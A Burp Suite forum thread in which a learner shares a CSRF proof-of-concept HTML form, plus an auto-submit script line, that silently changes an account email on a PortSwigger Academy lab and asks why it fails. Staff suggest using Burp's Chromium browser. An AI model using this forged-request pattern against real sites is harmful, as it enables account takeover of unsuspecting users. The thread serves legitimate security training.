Burp Suite User Forum

CSRF PoC doesn't work in PortSwigger's labs.

Ab | Last updated: Jan 23, 2023 11:41AM UTC

Hi, I've done some labs in the Academy and some are easy to understand and solve. However, the CSRF section doesn't work for me. I have created a PoC for the first CSRF lab, titled "CSRF vulnerability with no defenses".

PoC:

    <html>
      <body>
        <form method="POST" action="https://0a7b0052033aa998c073227300da008d.web-security-academy.net/my-account/change-email">
          <input type="hidden" name="email" value="fwafwa2f%40gmail.com"/>
          <input type="submit" value="Submit">
        </form>
      </body>
    </html>

However, this doesn't work, whether I run it from a local HTML file or on the exploit server. I tested other labs and none seem to work for me. I understand the CSRF concept, I just can't seem to get the labs solved. I have SameSite protection disabled in Firefox (about:config). I tried to use other browsers and it won't work. Please help! Thanks.

Ab | Last updated: Jan 23, 2023 11:44AM UTC

I know I will have to add <script> document.forms[0].submit(); </script> so the page runs automatically. This doesn't work either; I just wanted to test it out manually first. But yeah, the email never gets changed. I can change the email using Repeater, but not with the PoC.

Hannah, PortSwigger Agent | Last updated: Jan 23, 2023 02:03PM UTC

Hi,

Have you tried doing this in Burp's inbuilt Chromium browser? Have you watched any of the community solutions as a video guide for the lab?
